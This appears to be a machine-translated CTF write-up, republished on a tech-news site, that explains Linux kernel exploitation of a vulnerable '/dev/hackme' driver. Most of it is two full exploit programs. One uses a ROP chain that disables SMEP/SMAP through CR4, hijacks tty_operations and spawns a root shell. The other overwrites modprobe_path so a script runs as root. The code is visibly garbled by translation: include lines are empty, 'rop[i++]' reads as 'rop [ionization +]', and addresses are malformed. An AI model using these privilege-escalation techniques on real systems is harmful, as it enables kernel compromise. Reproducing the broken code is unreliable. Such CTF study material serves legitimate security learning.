In addition to Weibo, there is also WeChat
Please pay attention
WeChat public account
Shulou
2025-04-06 Update From: SLTechnology News&Howtos shulou NAV: SLTechnology News&Howtos > Development >
Share
Shulou(Shulou.com)05/31 Report--
This article introduces the relevant knowledge of "kernel hijacking modprobe path content instance Analysis". In the operation of actual cases, many people will encounter such a dilemma. Next, let the editor lead you to learn how to deal with these situations. I hope you can read it carefully and be able to achieve something!
Exp1
Smep:smep means that user data is not executable. When CPU is in ring0 mode, executing user space code will trigger a page error. The system determines whether the kernel enables smep according to bit 20 of the CR4 register, which is enabled at 1 and closed at 0 (bit 21 is SMAP).
Smap:smap user data is not accessible.
It can be bypassed by controlling the cr4 register to 0x6f0.
# include # include size_t vmlinux_base, off, commit_creds, prepare_kernel_cred;size_t user_cs, user_ss, user_sp, user_rflags;size_t raw_vmlinux_base = 0xffffffffffffffffffffff81000000X sizetreast rop [0x100] = {0}; int fd;struct Heap {size_t index; char * data; size_t len; size_t offset;}; void add (int index, size_t len, char * data) {struct Heap heap Heap.index = index; heap.data = data; heap.len = len; ioctl (fd, 0x30000, & heap);} void delete (int index) {struct Heap heap; heap.index = index; ioctl (fd, 0x30001, & heap);} void edit (int index, size_t len, size_t offset, char * data) {struct Heap heap; heap.index = index Heap.data = data; heap.len = len; heap.offset = offset; ioctl (fd, 0x30002, & heap);} void show (int index, size_t len, size_t offset, char * data) {struct Heap heap; heap.index = index; heap.data = data; heap.len = len; heap.offset = offset; ioctl (fd, 0x30003, & heap) } void save_status () {_ asm__ ("mov user_cs, cs;"mov user_ss, ss;"mov user_sp, rsp;"pushf;"pop user_rflags;"); puts ("[+] save the state success!") } void get_shell () {if (getuid () = = 0) {puts ("[*] get root"); system ("/ bin/sh");} else {puts ("[-] get root error"); sleep (3); exit (0) }} void get_root () {/ / commit_creds (prepare_kernel_cred (0)) void * (* pkc) (int) = (void * (*) (int)) prepare_kernel_cred; void (* cc) (void *) = (void (*) (void *)) commit_creds; (* cc) ((* pkc) (0));} int main () {save_status () Char buf [0x1000] = {0}; size_t fake_tty_struct [4] = {0}; size_t fake_tty_operations [35] = {0}; fd = open ("/ dev/hackme", 0); if (fd)
< 0) { puts("[-] open file error"); sleep(3); exit(0); } add(0, 0x2e0, buf); // 0 add(1, 0x2e0, buf); // 1 add(2, 0x100, buf); // 2 add(3, 0x100, buf); // 3 delete(0); delete(2); show(3, 0x100, -0x100, buf); size_t heap_addr = ((size_t *)buf)[0] - 0x200; printf("[+] heap_addr=>0x%lx\ n ", heap_addr); int fd_tty = open (" / dev/ptmx ", O_RDWR | O_NOCTTY); if (fd_tty)
< 0) { puts("[-] open ptmx error"); sleep(3); exit(0); } show(1, 0x400, -0x400, buf); vmlinux_base = ((size_t *)buf)[3] - 0x625d80; printf("[+] vmlinux_base=>0x%lx\ n ", vmlinux_base); off = vmlinux_base-raw_vmlinux_base; commit_creds = off + 0xffffffffff8104d220; prepare_kernel_cred = off + 0xffffffffffff8104d3d0; int I = 0; rop [ionization +] = off + 0xffffffffffffffffffff8101b5a1; / / pop rax; ret; rop [ionization +] = 0x6f0; rop [ionization +] = off + 0xffffffffffffffffff8100252b; / / mov cr4, rax; push rcx; popfq; pop rbp; ret Rop [ionization +] = 0; rop [ionization +] = (size_t) get_root; rop [ionization +] = off + 0xffffffffffffffffffffffff81200c2e; / / swapgs; popfq; pop rbp; ret; rop [ionization +] = 0; rop [ionization +] = 0; rop [ionization +] = off + 0xffffffffffffffffffffffffffffffffffffffffff81019356; / / iretq; pop rbp; ret; rop [ionization +] = (size_t) get_shell; rop [ionization +] = user_cs Rop [ionization +] = user_rflags; rop [ionization +] = user_sp; rop [ionization +] = user_ss; add (2, 0x100, (char *) rop); fake_tty_operations [7] = off + 0xffffffffffffffffffffffff810608d5; / / push rax; pop rsp; ret; fake_tty_operations [0] = off + 0xffffffffffffffff810484f0; / / pop rsp; ret; fake_tty_operations [1] = heap_addr ((size_t *) buf) [3] = heap_addr + 0x100; delete (3); add (3, 0x100, (char *) fake_tty_operations); edit (1, 0x400,-0x400, buf); write (fd_tty, "FXC", 3); return 0;} exp2
Mod_tree: you can disclose the driver address and look for it here when you can't find it in the stack.
Modprobe_path: when we execute an illegal file, we will execute the file pointed to by modprobe_path with root permission, usually pointing to / sbin/modprobe. If we change it to the file of cat flag we created, then we can get flag.
# include # include int fd;size_t heap_base, vmlinux_base, mod_tree, modprobe_path, ko_base, pool_addr;struct Heap {size_t index; char * data; size_t len; size_t offset;}; void add (int index, size_t len, char * data) {struct Heap heap; heap.index = index; heap.data = data; heap.len = len Ioctl (fd, 0x30000, & heap);} void delete (int index) {struct Heap heap; heap.index = index; ioctl (fd, 0x30001, & heap);} void edit (int index, size_t len, size_t offset, char * data) {struct Heap heap; heap.index = index; heap.data = data; heap.len = len; heap.offset = offset Ioctl (fd, 0x30002, & heap);} void show (int index, size_t len, size_t offset, char * data) {struct Heap heap; heap.index = index; heap.data = data; heap.len = len; heap.offset = offset; ioctl (fd, 0x30003, & heap);} void get_flag () {puts ("[+] Prepare shell file.") System ("echo-ne'#! / bin/sh\ n/bin/chmod 777 / flag\ n'> / shell.sh"); system ("chmod + x / shell.sh"); puts ("[+] Prepare trigger file."); system ("echo-ne'\\ xff\\ xff\ xff\ xff' > / FXC"); system ("chmod + x / FXC") System ("cat / proc/sys/kernel/modprobe"); system ("/ FXC"); system ("cat / flag"); sleep (5);} int main () {fd = open ("/ dev/hackme", 0); if (fd)
< 0) { puts("[-] open file error"); sleep(3); exit(0); } char buf[0x1000] = {0}; add(0, 0x100, buf); // 0 add(1, 0x100, buf); // 1 add(2, 0x100, buf); // 2 add(3, 0x100, buf); // 3 add(4, 0x100, buf); // 4 delete(1); delete(3); show(4, 0x100, -0x100, buf); heap_base = ((size_t *)buf)[0] - 0x100; printf("[+] heap_addr=>0x%lx\ n ", heap_base); show (0, 0x200,-0x200, buf); vmlinux_base= ((size_t *) buf) [0]-0x8472c0; printf (" [+] vmlinux_base= > 0x%lx\ n ", vmlinux_base); mod_tree = vmlinux_base + 0x811000; modprobe_path = vmlinux_base + 0x83f960; memset (buf,'\ x00,0x100) ((size_t *) buf) [0] = mod_tree + 0x40; edit (4, 0x100,-0x100, buf); add (5, 0x100, buf); / / 5 add (6, 0x100, buf); / / 6 show (6, 0x40,-0x40, buf); ko_base = (size_t *) buf) [3] Printf ("[+] ko_base= > 0x%lx\ n", ko_base); delete (2); delete (5); getchar (); ((size_t *) buf) [0] = ko_base + 0x2400 + 0xc0; edit (4, 0x100,-0x100, buf); add (7, 0x100, buf); / / 7 add (8, 0x100, buf) / 8 ((size_t *) buf) [0] = modprobe_path; ((size_t *) buf) [1] = 0x100; edit (8, 0x10, 0, buf); strncpy (buf, "/ shell.sh\ x00", 0xa); edit (12, 0xa, 0, buf); get_flag (); return 0 } this is the end of the content analysis of kernel hijacking modprobe path content. Thank you for your reading. If you want to know more about the industry, you can follow the website, the editor will output more high-quality practical articles for you!
Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.
Views: 0
*The comments in the above article only represent the author's personal views and do not represent the views and positions of this website. If you have more insights, please feel free to contribute and share.
Continue with the installation of the previous hadoop.First, install zookooper1. Decompress zookoope
"Every 5-10 years, there's a rare product, a really special, very unusual product that's the most un
© 2024 shulou.com SLNews company. All rights reserved.
12
Report
